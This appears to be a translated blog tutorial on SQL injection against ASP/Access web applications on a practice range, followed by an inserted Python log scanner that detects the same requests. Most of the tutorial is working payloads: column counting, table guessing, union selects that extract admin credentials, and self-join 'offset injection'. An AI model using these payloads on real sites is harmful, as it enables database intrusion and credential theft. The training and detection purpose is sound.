SQL injection - access injection, access offset injection

2022-07-06 18:35:00 Aspirin. two thousand and two

Access Injection, Access Offset Injection

Access database structure

 Table name
	 Column name
		 Data

An Access + ASP injection practice range

IIS + ASP + Access

ASP is usually paired with Access
PHP is usually paired with MySQL
ASPX is usually paired with MSSQL

The conditions for injection are that a parameter can be passed in and that it interacts with the database (data interaction).

GET, POST and cookie parameters can all be injected.

Injection process

1.1. Open a page that accepts a parameter

http://127.0.0.1/asp/Production/PRODUCT_DETAIL.asp?id=1513

1.2. Determine the injection point

Test with a single quote ('), or with and 1=1 followed by and 1=2

1.3. Determine the number of fields

127.0.0.1/asp/Production/PRODUCT_DETAIL.asp?id=1513 order by 22

127.0.0.1/asp/Production/PRODUCT_DETAIL.asp?id=1513 order by 23

22 returns normally and 23 reports an error, which means the number of fields is 22.

The table being queried here is actually the product table, which turns out to have 22 columns.

1.4. Determine the table name

and exists (select * from admin): if a table named admin exists, the page echoes normally; if it does not exist, the page returns an error.

1.5. Union query

union select

Because this is an Access database, which has only table names, column names and content, you need to specify a table.

?id=1513 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin

admin is commonly the table that stores administrator information; in Access, table names have to be guessed.

Positions 3 and 15 are echoed back, which means we can read data at positions 3 and 15, that is, the data of the columns we specify.

http://117.24.12.33:10000/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT 1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin

This password has been through MD5 encryption.

Tips for guessing column names

View the source code of the admin back end (the login page).

This range has been modified

Access offset injection (the table name is known, but the column names cannot be guessed)

After the display positions have been revealed, determine the number of fields in the table.

127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,* from admin    -> error
127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,* from admin    -> error
127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,* from admin    -> error

And so on, until ...

127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,* from admin    -> correct

This shows that the admin table has 6 fields.

* stands for the fields of the admin table; work out how many positions * takes the place of.

The principle of Access offset injection. The basic formula is:

Subtract the number of fields that * stands for from the order by field count; then take the order by field count again and subtract 2 times the * count just obtained:

* = 6 characters
2 × * = 12 characters
22 - 12 = 10 characters

Revealing the column data
First-level offset:
union select 1,2,3,4,5,6,7,8,9,10,* from (admin as a inner join admin as b on a.id = b.id)
If you check the page source after the statement above and find no data, use the following method:
Second-level offset statement:
union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)
Note: here the 10 fields from the first level minus the 6 fields of the table leaves 4, so the second-level offset here is select 1,2,3,4

Or:
union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin as b on a.id = b.id)

At this point, view the page source and you will find a pleasant surprise.
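
On the defending side, each request shape walked through above (the and 1=1 / and 1=2 probe, order by counting, and exists table guessing, union select, and the offset-injection form with a trailing * over a self-join) is recognisable in IIS logs. The following Python is an added example, not part of the original post; the rule names, the W3C field layout and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the request shapes walked through on this page.
RULES = {
    "boolean_probe": re.compile(r"\band\s+1\s*=\s*[12]\b", re.I),
    "order_by_count": re.compile(r"\border\s+by\s+\d+\b", re.I),
    "table_guess": re.compile(r"\band\s+exists\s*\(\s*select\b", re.I),
    "union_select": re.compile(r"\bunion\s+select\b", re.I),
    # Offset injection: a select list ending in '*' plus a table joined to itself.
    "offset_star": re.compile(r"\bunion\s+select\b[^*]*,\s*\*\s+from\b", re.I),
    "self_join": re.compile(r"\b(\w+)\s+as\s+\w+\s+inner\s+join\s+\1\s+as\b", re.I),
}

def classify(raw_query):
    """Return the sorted rule names that match one cs-uri-query value."""
    q = raw_query
    for _ in range(2):               # undo up to two layers of URL encoding
        q = unquote_plus(q)
    return sorted(name for name, rx in RULES.items() if rx.search(q))

def scan(lines):
    """Map client IP -> set of rule names, using the log's own #Fields header."""
    fields, hits = [], {}
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        tags = classify(row.get("cs-uri-query", "-"))
        if tags:
            hits.setdefault(row.get("c-ip", "?"), set()).update(tags)
    return hits

# Constructed sample log (not from the original page); IPs are documentation addresses.
SAMPLE = """#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2022-02-11 16:16:14 GET /asp/Production/PRODUCT_DETAIL.asp id=1513 192.0.2.10 200
2022-02-11 16:17:02 GET /asp/Production/PRODUCT_DETAIL.asp id=1513+order+by+23 192.0.2.44 500
2022-02-11 16:18:40 GET /asp/index.asp id=1513%20union%20select%201,2,3,*%20from%20(admin%20as%20a%20inner%20join%20admin%20as%20b%20on%20a.id=b.id) 192.0.2.44 200
""".splitlines()

if __name__ == "__main__":
    for ip, tags in scan(SAMPLE).items():
        print(ip, sorted(tags))
```

A client that accumulates order_by_count followed by union_select, or any request matching both offset_star and self_join, is worth triaging first, since ordinary traffic to an id parameter matches none of these rules.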

Mozhe range practice

The password has been through MD5 encryption.

Copyright notice
This article was created by [Aspirin. two thousand and two]. Please include the original link when reposting. Thanks.
https://yzsam.com/2022/02/202202131300353150.html